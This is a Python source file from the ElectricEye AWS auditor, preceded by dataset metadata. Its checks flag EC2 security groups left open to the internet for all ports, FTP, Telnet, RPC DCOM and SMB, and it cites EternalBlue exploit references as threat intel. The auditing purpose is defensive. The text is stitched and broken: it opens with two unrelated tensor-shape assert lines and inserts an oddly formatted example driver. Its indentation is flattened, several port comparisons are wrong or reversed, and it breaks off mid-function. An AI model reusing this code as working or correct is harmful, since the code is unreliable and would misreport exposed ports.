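assert block(x).shape == x.shape             # residual block keeps the shape
assert pre(x).shape == (2, 16, 12, 12, 12)   # only the channel count changes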
25a18a2801476bffae7d8c653c93a397575b7605 | 226,652 | py | Python | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 442 | 2020-03-15T20:56:36.000Z | 2022-03-31T22:13:07.000Z | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 57 | 2020-03-15T22:09:56.000Z | 2022-03-31T13:17:06.000Z | eeauditor/auditors/aws/Amazon_EC2_Security_Group_Auditor.py | kbhagi/ElectricEye | 31960e1e1cfb75c5d354844ea9e07d5295442823 | [
"Apache-2.0"
] | 59 | 2020-03-15T21:19:10.000Z | 2022-03-31T15:01:31.000Z | #This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
from check_register import CheckRegister
registry = CheckRegister()
ec2 = boto3.client("ec2")
# loop through security groups
def describe_security_groups(cache):
response = cache.get("describe_security_groups")
if response:
return response
cache["describe_security_groups"] = ec2.describe_security_groups()
return cache["describe_security_groups"]
@registry.register_check("ec2")
def security_group_all_open_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if ipProtocol == "-1" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-all-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols",
"Description": "Security group "
+ sgName
+ " allows unrestricted access to all ports and protocols. Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif ipProtocol == "-1" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-all-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.1] Security groups should not allow unrestricted access to all ports and protocols",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted access to all ports and protocols. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
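# Illustrative driver, not part of the auditor: each registered check above is a
# generator of AWS Security Hub finding dicts (assuming the register_check
# decorator leaves the function callable). The account, region, and partition
# values are placeholders, and a configured boto3 session with
# ec2:DescribeSecurityGroups permission is assumed.
def _example_collect_failed_findings():
    findings = list(
        security_group_all_open_check(
            cache={},
            awsAccountId="111122223333",
            awsRegion="us-east-1",
            awsPartition="aws",
        )
    )
    return [f for f in findings if f["Compliance"]["Status"] == "FAILED"]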
@registry.register_check("ec2")
def security_group_open_ftp_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort == "20" and fromPort == "21" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-ftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted File Transfer Protocol (FTP) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort == "20" and fromPort == "21" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-ftp-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.2] Security groups should not allow unrestricted File Transfer Protocol (FTP) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted File Transfer Protocol (FTP) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_telnet_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.3] Security groups should not allow unrestricted TelNet access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "23" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-telnet-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.3] Security groups should not allow unrestricted TelNet access",
"Description": "Security group "
+ sgName
+ " allows unrestricted TelNet access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "23" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-telnet-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.3] Security groups should not allow unrestricted TelNet access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted TelNet access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_dcom_rpc_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "135" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rpc-dcom-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Windows RPC DCOM access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Attack signature information, refer to Threatl Intel Source URL",
"Source": "Symantec Security Center",
"SourceUrl": "https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20387",
}
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
if toPort and fromPort == "135" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-rpc-dcom-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.4] Security groups should not allow unrestricted Windows RPC DCOM access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Windows RPC DCOM access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "Attack signature information, refer to Threatl Intel Source URL",
"Source": "Symantec Security Center",
"SourceUrl": "https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20387",
}
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_smb_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
if toPort and fromPort == "445" and cidrIpRange == "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-smb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access",
"Description": "Security group "
+ sgName
+ " allows unrestricted Server Message Blocks (SMB) access on "
+ ipProtocol
+ ". Refer to the remediation instructions to remediate this behavior. Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue",
},
{
"Category": "BACKDOOR",
"Value": "How to use EternalBlue to Exploit SMB Port using Public Wi-Fi",
"Source": "Medium",
"SourceUrl": "https://medium.com/@melvinshb/how-to-use-eternalblue-to-exploit-smb-port-using-public-wi-fi-79a996821767",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
elif toPort and fromPort == "445" and cidrIpRange != "0.0.0.0/0":
finding = {
"SchemaVersion": "2018-10-08",
"Id": sgArn + "/" + ipProtocol + "/security-group-smb-open-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": sgArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[SecurityGroup.5] Security groups should not allow unrestricted Server Message Blocks (SMB) access",
"Description": "Security group "
+ sgName
+ " does not allow unrestricted Server Message Blocks (SMB) access on "
+ ipProtocol
+ ". Your security group should still be audited to ensure any other rules are compliant with organizational or regulatory requirements.",
"Remediation": {
"Recommendation": {
"Text": "For more information on modifying security group rules refer to the Adding, Removing, and Updating Rules section of the Amazon Virtual Private Cloud User Guide",
"Url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#AddRemoveRules",
}
},
"ThreatIntelIndicators": [
{
"Category": "BACKDOOR",
"Value": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption",
"Source": "Rapid7 Vulnerability & Exploit Database",
"SourceUrl": "https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue",
},
{
"Category": "BACKDOOR",
"Value": "How to use EternalBlue to Exploit SMB Port using Public Wi-Fi",
"Source": "Medium",
"SourceUrl": "https://medium.com/@melvinshb/how-to-use-eternalblue-to-exploit-smb-port-using-public-wi-fi-79a996821767",
},
],
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsEc2SecurityGroup",
"Id": sgArn,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {
"AwsEc2SecurityGroup": {"GroupName": sgName, "GroupId": sgId,}
},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-3",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-17",
"NIST SP 800-53 AC-19",
"NIST SP 800-53 AC-20",
"NIST SP 800-53 SC-15",
"AICPA TSC CC6.6",
"ISO 27001:2013 A.6.2.1",
"ISO 27001:2013 A.6.2.2",
"ISO 27001:2013 A.11.2.6",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
continue
@registry.register_check("ec2")
def security_group_open_mssql_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[SecurityGroup.6] Security groups should not allow unrestricted Microsoft SQL Server (MSSQL) access"""
response = describe_security_groups(cache)
mySgs = response["SecurityGroups"]
for secgroup in mySgs:
sgName = str(secgroup["GroupName"])
sgId = str(secgroup["GroupId"])
sgArn = f"arn:{awsPartition}:ec2:{awsRegion}:{awsAccountId}:security-group/{sgId}"
for permissions in secgroup["IpPermissions"]:
try:
fromPort = str(permissions["FromPort"])
except Exception as e:
if str(e) == "'FromPort'":
continue
else:
print(e)
try:
toPort = str(permissions["ToPort"])
except Exception as e:
if str(e) == "'ToPort'":
continue
else:
print(e)
try:
ipProtocol = str(permissions["IpProtocol"])
except Exception as e:
print(e)
ipRanges = permissions["IpRanges"]
for cidrs in ipRanges:
cidrIpRange = str(cidrs["CidrIp"])
iso8601Time = (
datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
)
